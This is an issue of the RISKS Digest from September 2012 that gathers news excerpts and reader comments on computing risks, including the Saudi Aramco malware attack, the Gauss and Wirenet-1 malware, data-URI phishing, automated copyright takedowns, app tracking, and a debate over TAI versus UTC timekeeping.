The Risks Digest

The RISKS Digest

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Volume 27 Issue 02

Thursday 6 September 2012


Hantavirus warning e-mails and letters
Monty Solomon
Lockheed Air-Traffic Upgrade Now on Track, FAA Chief Says
Dave Farber
United Airlines Investigates Network Failure Delaying 580 Flights
Gabe Goldberg
Hack on Saudi Aramco hit 30,000 workstations, oil firm admits
John Leyden via Monty Solomon
Thousands fall victim to utility payment scam
Scott Bauer via Monty Solomon
Can YOU crack the Gauss uber-virus encryption?
John Leyden via Monty Solomon
Harvard Students in Cheating Scandal Say Collaboration Was Accepted
"Automated DRM keeps spoiling the show, from the DNC to Mars"
Phipps-Samson via Gene Wirchenko
Ustream continues to attempt explaining Hugo Awards stream blackout
Lauren Weinstein
Did YouTube Really Block Michelle Obama's DNC Speech for Copyright Infringement?
Lauren Weinstein
1 million iOS device IDs leaked after alleged FBI laptop hack
ars technica via Lauren Weinstein
FBI Says Laptop Wasn't Hacked; never possessed Apple device ID file
WiReD via Lauren Weinstein
"When virtualization becomes your worst enemy"
Gene Wirchenko
When GPS Confuses, You May Be to Blame
Randall Stross via Matthew Kruk
'first ever' Linux, Mac OS X-only password sniffing Trojan spotted
John Leyden via Monty Solomon
Apple patent would disable phone based on location
NBC via Lauren Weinstein
Smartphone apps track users even when shut down
Richard M. Smith
Honeytrap reveals mass monitoring of downloaders
Paul Marks via Dewayne Hendricks
Firefox, Opera allow crooks to hide an entire phish site in a link
John Leyden via Monty Solomon
Test Mercenaries: Quality at Google, 2006-2011
Mike Bland via jidanni
Re: The Cadillac Your Livery Driver Has Been Dreaming Of
Joel Garry
Re: ... civil timekeeping meeting
Steve Allen
Info on RISKS (comp.risks)

Hantavirus warning e-mails and letters

Monty Solomon <>
Fri, 31 Aug 2012 09:02:58 -0400
Excerpt from

2 more Yosemite visitors have hantavirus

Meanwhile, the park sent warning e-mails and letters on Wednesday to another
1,000 people who stayed in tent cabins in Curry Village, after officials
found that a computer glitch had stopped the notices from going out with the
original 1,700 warnings on Monday. The warning says anyone with flu-like
symptoms or respiratory problems should seek immediate medical attention.

Lockheed Air-Traffic Upgrade Now on Track, FAA Chief Says

Dave Farber <>
Fri, 31 Aug 2012 21:02:08 -0400
A $2.4-billion replacement for the U.S. air-traffic control computers
plagued by delays and cost overruns will be completed within the revised
budget and 2014 deadline, said Michael Huerta, acting chief of the FAA.
[ERAM - En-Route Automation Modernization]  [Bloomberg, PGN-ed]

  (well maybe!!! djf)

  [Browse on the Subject line for the article.  Dave's comment might relate
  to the fact that some of our readers may remember the eventual cancelation
  of an earlier en-route ATC modernization effort, after the expenditure of
  $4 billion.  It's nice to know costs are coming down!  PGN]

United Airlines Investigates Network Failure Delaying 580 Flights

Gabe Goldberg <>
Tue, 04 Sep 2012 09:01:59 -0400
Bloomberg, 28 Aug 2012

Hack on Saudi Aramco hit 30,000 workstations, oil firm admits (John Leyden)

Monty Solomon <>
Mon, 3 Sep 2012 19:52:17 -0400
First hacktivist-style assault to use malware?

John Leyden, *The Register*, 29 August 2012

Analysis Saudi Aramco said that it had put its network back online on
Saturday, 10 days after a malware attack floored 30,000 workstations at the
oil giant.  In a statement [1], Saudi Arabia's national oil firm said that
it had "restored all its main internal network services" hit by a malware
outbreak that struck on 15 August. The firm said its core business of oil
production and exploration was not affected by the attack, which resulted in
a decision to suspend Saudi Aramco's website for a period of a few days,
presumably as a precaution. Corporate remote access services were also
suspended as a result of the attack.

Oil and production systems were run off "isolated network systems unaffected
by the attack, which the firm has pledged to investigate.  In the meantime,
Saudi Aramco promised [2] to improve the security of its network to guard
against fresh assaults. ...

Thousands fall victim to utility payment scam (Scott Bauer)

Monty Solomon <>
Mon, 3 Sep 2012 10:29:50 -0400
Scott Bauer, Thousands fall victim to utility payment scam, Associated
Press, 12 Jul 2012

As much as President Barack Obama wants your vote, he's not actually
offering to pay your monthly bills.  But thousands of Americans have been
persuaded otherwise, falling victim to a fast-moving scam that claims to be
part of an Obama administration program to help pay utility bills in the
midst of a scorching summer.

The scheme spread quickly across the nation in recent weeks with help from
victims who unwittingly shared it on social media sites before realizing
they had been conned out of personal information such as Social Security,
credit card and checking account numbers.  ...

Can YOU crack the Gauss uber-virus encryption?

Monty Solomon <>
Mon, 3 Sep 2012 19:52:17 -0400
Appeal for help to break open hidden scrambled payload

John Leyden, *The Register*, 14 August 2012

Antivirus experts have called on cryptographers and other clever bods for
help after admitting they are no closer to figuring out the main purpose of
the newly discovered Gauss supervirus.

While it's known that the complex malware features many information-stealing
capabilities, with a specific focus on capturing website passwords, online
banking account credentials and system configuration data from infected
machines, the content of the virus's encrypted payload is still a mystery.

Kaspersky Lab had tracked Gauss for weeks before announcing its discovery
last week. Antivirus experts at the security biz and elsewhere have been
burning the midnight oil in the days since, and although progress has been
made - for example in analysing its architecture [1], unique modules and
communication methods - the payload encryption is unbroken.

Researchers reckon the hidden binary blob, when decrypted and executed,
looks for a program specifically named using an extended character set, such
as Arabic or Hebrew. What that program might be remains unclear as long as
the encryption remains unbroken.

The general concuss among security experts is that Gauss - like Flame, Duqu
and Stuxnet before it - is a nation-state sponsored cyber-espionage toolkit,
quite possibly built from the same components as Flame. ...

  [One of my colleagues suggests that unraveling the hidden payload would
  require breaking some serious crypto, and that someone successfully doing
  so might not be in a position to want to claim success.  But RISKS awaits
  any further news on this topic.  PGN]

Harvard Students in Cheating Scandal Say Collaboration Was Accepted

"Peter G. Neumann" <>
Sun, 2 Sep 2012 17:12:03 PDT
  [An early mention of this case stated: “Harvard University is
  investigating what it calls an `unprecedented' case of cheating.  College
  officials say around 125 students may have shared answers and plagiarized
  on a [Introduction To Congress] final exam.''  Source: Curt Nickisch, NPR
  31 Aug.]  The exam in question was an open-book take-home exam from a
  professor reportedly inclined to give mostly high grades based in part on
  factors such as the number of citations!  Perhaps many of the 125 students
  were citing the same sources from the Internet?  Is that collusion or
  collation collision?  We await details.  PGN]

Richard Perez-Pena, *The New York Times*, 31 Aug 2012

Harvard students suspected in a major cheating scandal said that many of the
accusations are based on innocent - or at least tolerated - collaboration
among students, and with help from graduate-student teachers who sometimes
gave them answers to test questions.

Students said they were tripped up by a course whose tests were confusing,
whose grading was inconsistent, and for which the professor and teaching
assistants gave contradictory signals about what was expected. They face the
possibility of a one-year suspension from Harvard or revocation of their
diplomas if they have already graduated, and some said that they will sue
the university if any serious punishment is meted out.

In years past, the course, Introduction to Congress, had a reputation as one
of the easiest at Harvard College.  Some of the 279 students who took it in
the spring semester said that the teacher, Matthew B. Platt, an assistant
professor of government, told them at the outset that he gave high grades
and that neither attending his lectures nor the discussion sessions with
graduate teaching fellows was mandatory. ...

"Automated DRM keeps spoiling the show, from the DNC to Mars" (Phipps-Samson)

Gene Wirchenko <>
Wed, 05 Sep 2012 14:02:03 -0700
Simon Phipps and Ted Samson, Robots aren't smart enough to decide if video
or song is used lawfully; instead of trying to improve content monitoring
software, we should look to ditch it, *InfoWorld*, 5 Sep 2012

opening text (one of the examples):

Science-fiction fans from all over the world were avidly watching the live
broadcast of the Hugo Awards last Sunday from Chicon 7, the World Science
Fiction Convention in Chicago. This is a venerable event with much more
longevity than you might imagine: Attendees were celebrating the event's
70th year. One of the award winners, British author Neil Gaiman, was
recognized for a script for the cult BBC TV series "Doctor Who." Following
the showing of a clip from the episode, Gaiman took the podium for the award
ceremony to make his acceptance speech.

Then, however, the broadcast was abruptly cut off. A robot at Ustream,
presumably using data provided by the BBC, decided on the basis of that
short clip that this was an illegal broadcast of "Doctor Who" and pulled the
plug. Worse, it turned out that no one at the Hugo Awards or at Ustream was
empowered to turn it back on again.  Ustream has promised to upgrade its
robot to understand fair use, but the proposal is both ridiculous—even
judges struggle with fair use arguments—and dangerous.

Ustream continues to attempt explaining Hugo Awards stream blackout

Lauren Weinstein <>
Tue, 4 Sep 2012 09:41:40 -0700
  "This occurred because our 3rd party automated infringement system,
  Vobile, detected content in the stream that it deemed to be copyrighted.
  Vobile is a system that rights holders upload their content for review on
  many video sites around the web.  The video clips shown prior to Neil's
  speech automatically triggered the 3rd party system at the behest of the
  copyright holder." (Ustream via NNSquad)

Most of the folks commenting on their posting are not very happy.

  [In another NNS posting on this subject, Lauren Weinstein added, “A
  similar risk exists with Google's "Hangouts On Air" via Content ID.
  Solutions are not trivial.''  PGN]

    [Lee Rudolph noted Hugo and the Rampaging Robots.  PGN]

Did YouTube Really Block Michelle Obama's DNC Speech for Copyright Infringement?

Lauren Weinstein <>
Wed, 5 Sep 2012 15:04:11 -0700  (This message on Google+)  (Slate, via NNSquad)

  "Either way, this amounts to something less than a copyright apocalypse.
  Michelle Obama's speech is still available on plenty of other YouTube
  channels, including here, here, and here. But on the heels of the Hugo
  Awards debacle, it's another reminder of the need for human vigilance
  against overzealous digital-rights-management algorithms.  In a statement
  chalking up the glitch to "a technical error on YouTube," an Obama
  campaign official added, "We do not expect tonight's coverage will be
  affected." Copyright bots, the gauntlet has been thrown!"

Irrespective of this particular case, this whole area (not just YouTube) of
automated content flagging needs serious attention from a number of
standpoints.  Here's an example of what has happened to me (and many other
people).  I uploaded a video of mine that included a segment of old,
definitely public domain material.  Shortly thereafter, my entire vid was
flagged by YouTube's Content ID.  Why?  It took some digging to figure out,
but it turns out a Content ID partner had uploaded a video of their own that
happened to include a section of the same public domain material I had used.
This apparently made it look like my video was infringing, since Content ID
assumed the section of my vid that matched their vid was in violation.
Wrong!  But Content ID partners get the assumption of being correct, and
there's no way for an average user to assert that something is public domain
a priori.  I was able to get this reversed by careful explanation on the
appropriate forms, but I wonder how many people would just throw up their
arms and say, "To hell with it!" and not bother?  This is not an easy
situation to solve, but the explicit assumption that Content ID partners are
correct and that takedowns or other actions are immediate—with a protest
required to get blocks, etc. removed after the fact, strikes me as
increasingly problematic.

Lauren Weinstein (
Network Neutrality Squad:  +1 (818) 225-2800

1 million iOS device IDs leaked after alleged FBI laptop hack

Lauren Weinstein <>
Tue, 4 Sep 2012 09:35:18 -0700
  "One million unique device identifiers (UDIDs) from iOS devices have been
  posted online by hacking group AntiSec, who claimed the UDIDs came from an
  FBI-owned laptop. The group published a file containing the UDIDs-as well
  as push notification tokens, device names, and more-on Monday evening,
  promising that there are plenty more entries where that came from. AntiSec
  claims the original file contained roughly 12 million UDID entries-some
  with very personal data attached, such as full names, cell numbers, and
  home addresses."  (ars technica via NNSquad)

[Key word right now is *alleged*.  LW]

FBI Says Laptop Wasn't Hacked; never possessed Apple device ID file

Lauren Weinstein <>
Tue, 4 Sep 2012 16:11:34 -0700
 "The Federal Bureau of Investigation is refuting a statement made by
  members of AntiSec this weekend that they hacked the laptop of an FBI
  special agent and stole a file containing 12 million Apple device IDs and
  associated personal information." (*Wired* via

"When virtualization becomes your worst enemy"

Gene Wirchenko <>
Tue, 04 Sep 2012 10:54:55 -0700
Wrapping everything up in the same box makes hard tasks easy and big
problems bigger, *InfoWorld*, 4 Sep 2012

  [The IT version of putting all of one's eggs in one basket?]

When GPS Confuses, You May Be to Blame (Randall Stross)

"Matthew Kruk" <>
Sun, 2 Sep 2012 01:20:45 -0600
Randall Stross, *The New York Times*, 1 Sep 2012 [PGN-ed]

The turn-by-turn instructions of GPS-based navigation systems, ingeniously
designed though they may be, can't always save us from ourselves.  Consider
the experience of a man from San Diego who flew to the East Coast and picked
up a GPS-equipped rental car at the airport. After 20 minutes, he sensed he
was headed in the wrong direction. Then he realized that he had unthinkingly
entered his California address as his destination.  "The navigation system
had dutifully set a route back to his home in San Diego, 3,000 miles away,"
said Barry Brown, co-director of the Mobile Life Center, based in Stockholm,
which does research on mobile communication. The incident happened to a
friend of his.  Mr. Brown is co-author of a recent paper titled "The Normal
Natural Troubles of Driving With GPS." The paper illuminates a drawback of
GPS technology: that it is designed for docile drivers whose navigational
skills have atrophied. ...

Randall Stross <> is an author based in Silicon Valley and
a professor of business at San Jose State University.

'first ever' Linux, Mac OS X-only password sniffing Trojan spotted (John Leyden)

Monty Solomon <>
Mon, 3 Sep 2012 19:52:17 -0400
John Leyden, Windows? Who the hell uses that? *The Register*, 29 August 2012

Security researchers have discovered a potential dangerous Linux and Mac OS
X cross-platform trojan.  Once installed on a compromised machine, Wirenet-1
opens a backdoor to a remote command server, and logs key presses to capture
passwords and sensitive information typed by victims.

The program also grabs passwords submitted to Opera, Firefox, Chrome and
Chromium web browsers, and credentials stored by applications including
e-mail client Thunderbird, web suite SeaMonkey, and chat app Pidgin.  The
malware then attempts to upload the gathered data to a server hosted in the
Netherlands. ...

Apple patent would disable phone based on location

Lauren Weinstein <>
Tue, 4 Sep 2012 21:24:26 -0700
  "Among a bevy of patents awarded to Apple this week was one that would
  enable or disable certain features of a phone depending on its
  location. It could be useful, but it also raises serious questions about
  who really owns your device."  (NBC via NNSquad)

A lot of ideas are patented but never used.  Anyway, without reading the
patent in detail, I'd note there are a variety of apps (that probably
postdate the patent application) that do this already.  One problem with any
attempt to enforce such a regime is that you need everyone to have phones
carrying the capability, and you have to be ready for the litigation
exposure if (for example) an important call or message is blocked by such a
system.  It doesn't take much imagination to think of a bunch of other
exposure examples as well.

Smartphone apps track users even when shut down

"Richard M. Smith" <>
Mon, 3 Sep 2012 08:10:44 -0400

Some smartphone apps collect and transmit sensitive information stored on a
phone, including location, contacts, and Web browsing histories, even when
the apps are not being used by the phone's owner, according to two
researchers at the Massachusetts Institute of Technology.

"It seems like people are no longer in control of their own privacy," said
Frances Zhang, a master's degree student in computer science at MIT.

Zhang and fellow researcher Fuming Shih, a computer science doctoral
candidate, found that some popular apps for phones running Google Inc.'s
Android operating system are continually collecting information without
informing the phone's owner.

The popular game Angry Birds uses the phone's GPS and Wi-Fi wireless
networking features to track the owner's location, even when he's not
playing the game, for example. Another game, Bowman, collects information
from the phone's Internet browser, including what websites the owner has
been visiting. And WhatsApp, a popular text-messaging program, scans the
user's address book when it is seemingly idle.

Honeytrap reveals mass monitoring of downloaders (Paul Marks)

Dewayne Hendricks <>
Wednesday, September 5, 2012
Paul Marks, *New Scientist*, 4 Sep 2012, via Dave Farber's IP

Anyone who has downloaded pirated music, video or ebooks using a BitTorrent
client has probably had their IP address logged by copyright-enforcement
authorities within 3 hours of doing so. So say computer scientists who
placed a fake pirate server online - and very quickly found monitoring
systems checking out who was taking what from the servers.

The news comes from this week's SecureComm conference in Padua, Italy, where
computer security researcher Tom Chothia and his colleagues at the
University of Birmingham, UK, revealed they have discovered "massive
monitoring" of BitTorrent download sites, such as the PirateBay, has been
taking place for at least three years.

BitTorrent is a data distribution protocol that splits an uploaded digital
media file into many parts and shares it around a swarm of co-operating
servers. Birmingham's fake server acted like a part of a file-sharing swarm
and the connections made to it quickly revealed the presence of file-sharing
monitors run by "copyright enforcement organisations, security companies and
even government research labs". ...

Firefox, Opera allow crooks to hide an entire phish site in a link (John Leyden)

Monty Solomon <>
Mon, 3 Sep 2012 19:52:17 -0400
John Leyden, Watch out for the tinyurl that isn't, *The Register*, 3 Sep 2012

A shortcoming in browsers including Firefox and Opera allows crooks to
easily hide an entire malicious web page in a clickable link - ideal for
fooling victims into handing over passwords and other sensitive info.

Usually, so-called "phishing attacks" rely on tricking marks into visiting
websites designed by criminals to masquerade as banks and online stores,
thus snaffling punters' credentials and bank account details when they try
to use the bogus pages. However this requires finding somewhere to host the
counterfeit sites, which are often quickly taken down by hosting companies
and the authorities or blocked by filters.

Instead, the malicious web pages can be stored in data URIs - uniform
resource identifiers, not to be confused with URLs - which stuff the web
code into a handy string that when clicked on, instructs the browser to
unpack the payload and present it as a page.

It negates the need to find somewhere to secrete your malicious page, and
once shortened using a service such as TinyURL, the URI can be reduced to a
small URL perfect for passing around social networks, online chats and
e-mail. Crooks would still need to set up a server to receive data from
victims, however. ...

Test Mercenaries: Quality at Google, 2006-2011 (Mike Bland)

Thu, 06 Sep 2012 07:38:34 +0800
"This crossed my desk this morning, it is a long and detailed (and honest!)
account by an insider of Google's efforts to increase code quality and
product quality: "

  [This item is indeed long, but could be worth reading if you consider
  yourself a software engineer.  PGN]

Re: The Cadillac Your Livery Driver Has Been Dreaming Of (R-27.01)

jgar the jorrible <joel-garry>
Wed, 5 Sep 2012 14:52:06 -0700 (PDT)
An MSN editorial had some insight:

"...Is that my cell phone buzzing, or the seat?

2013 Cadillac XTS (c) GMCadillac has a good idea here. Instead of annoying
the driver with flashing lights and buzzing sounds from various active
safety systems, it sends all those warnings to his back and rear end. ...

The touch-capacitive dash is another story. See those silver trim pieces
that look like you should touch them? Don't. They're just finger guides. The
actual sensors are above them, which is confusing and frustrating. They're
also slow to respond to repeated inputs, like adjusting the cooled seat or
the fan speed, unless you're deliberate with your pace and timing. Who wants
to think about how you touch a control, especially while driving? Lincoln
already came out with this system and it's no different. It's like tapping a
plastic post and wondering if some magic will happen. You also feel kind of
dumb getting it wrong, which tends to happen when you're paying attention to
the road.

This feature needs to die."

Personally, I'm amazed that any UI designer for car controls would even
think of making hand-eye coordination necessary for ancillary controls.  I
can control my old New Beetle radio and HVAC by touch, with very little
learning.  But my other cars with touch screens, any little bump and the
wrong command gets invoked.  And the voice control?  I could go on and on,
but in a nutshell, not there yet, adds frustration.

Re: ... civil timekeeping meeting (RISKS-26.92,93,98,27.01)

Steve Allen <>
Fri, 31 Aug 2012 10:20:22 -0700
> And the people who don't like leap seconds or find them hard to deal
> with can switch to TAI, which already exists.  Need a cheap local
> source of TAI?  Get a GPS.  And start setting up an NTP network of TAI
> timeservers—anyone doing this yet?

People are doing this.  Several manufacturers of NTP servers allow an option
where it can *violate the NTP spec* and provide GPS time or TAI instead of
UTC.  Alternatively, the IEEE 1588 spec for PTP is all about this notion of
an operational system time scale based on TAI.  Alas, many international
agencies responsible for this subject do not have scope of purview to make
pronouncements on this subject, and the proceedings of various meetings do
not show consensus.

During the past decade the pronouncements from the providers of TAI at BIPM
have done an about face.  In 1999 the CCTF wrote saying yes, use TAI instead
of UTC:

  The CCTF recommends, therefore, that in conformity with this ITU
  Recommendation developers of future satellite navigation systems and
  electronic communication systems should link their time scales to TAI as
  the only alternative to UTC and that, insofar as it is feasible, existing
  systems take steps to align their time scales with TAI.

But in 2007 the CCTF wrote quite the opposite, saying no, do not use TAI
instead of UTC:

  TAI is the uniform time scale underlying UTC, and that it should not be
  considered as an alternative time reference.

TAI also does not serve POSIX, which specifies that the time_t is based on a
trivial relationship to the face-value of UTC and that all days must have
86400 seconds.  Unfortunately for POSIX the entire point of the UTC used in
radio broadcast time signals since 1972 is that the second is not related to
the day.

 From a system engineering standpoint it makes sense to use TAI, but its
providers do not clearly agree.  Furthermore, it is not possible to use TAI
in an operational system because its value is not available until the next
month.  Using GPS system time is an available good choice from an
engineering standpoint, but GPS does not have international standard status
required by some contractual specifications.

The previous meeting on the future of UTC re-visited many of these subjects.
The final paper at that meeting gave a worked example of using leap-free
uniform atomic time (GPS or TAI) for POSIX while still retaining the notion
of UTC day defined by earth rotation.  Slides and preprints of the 400 pages
proceedings are available at

Steve Allen, UCO/Lick Observatory--ISB, 1156 High Street, Santa Cruz, CA
95064 +1 831 459 3046  <>

Please report problems with the web pages to the maintainer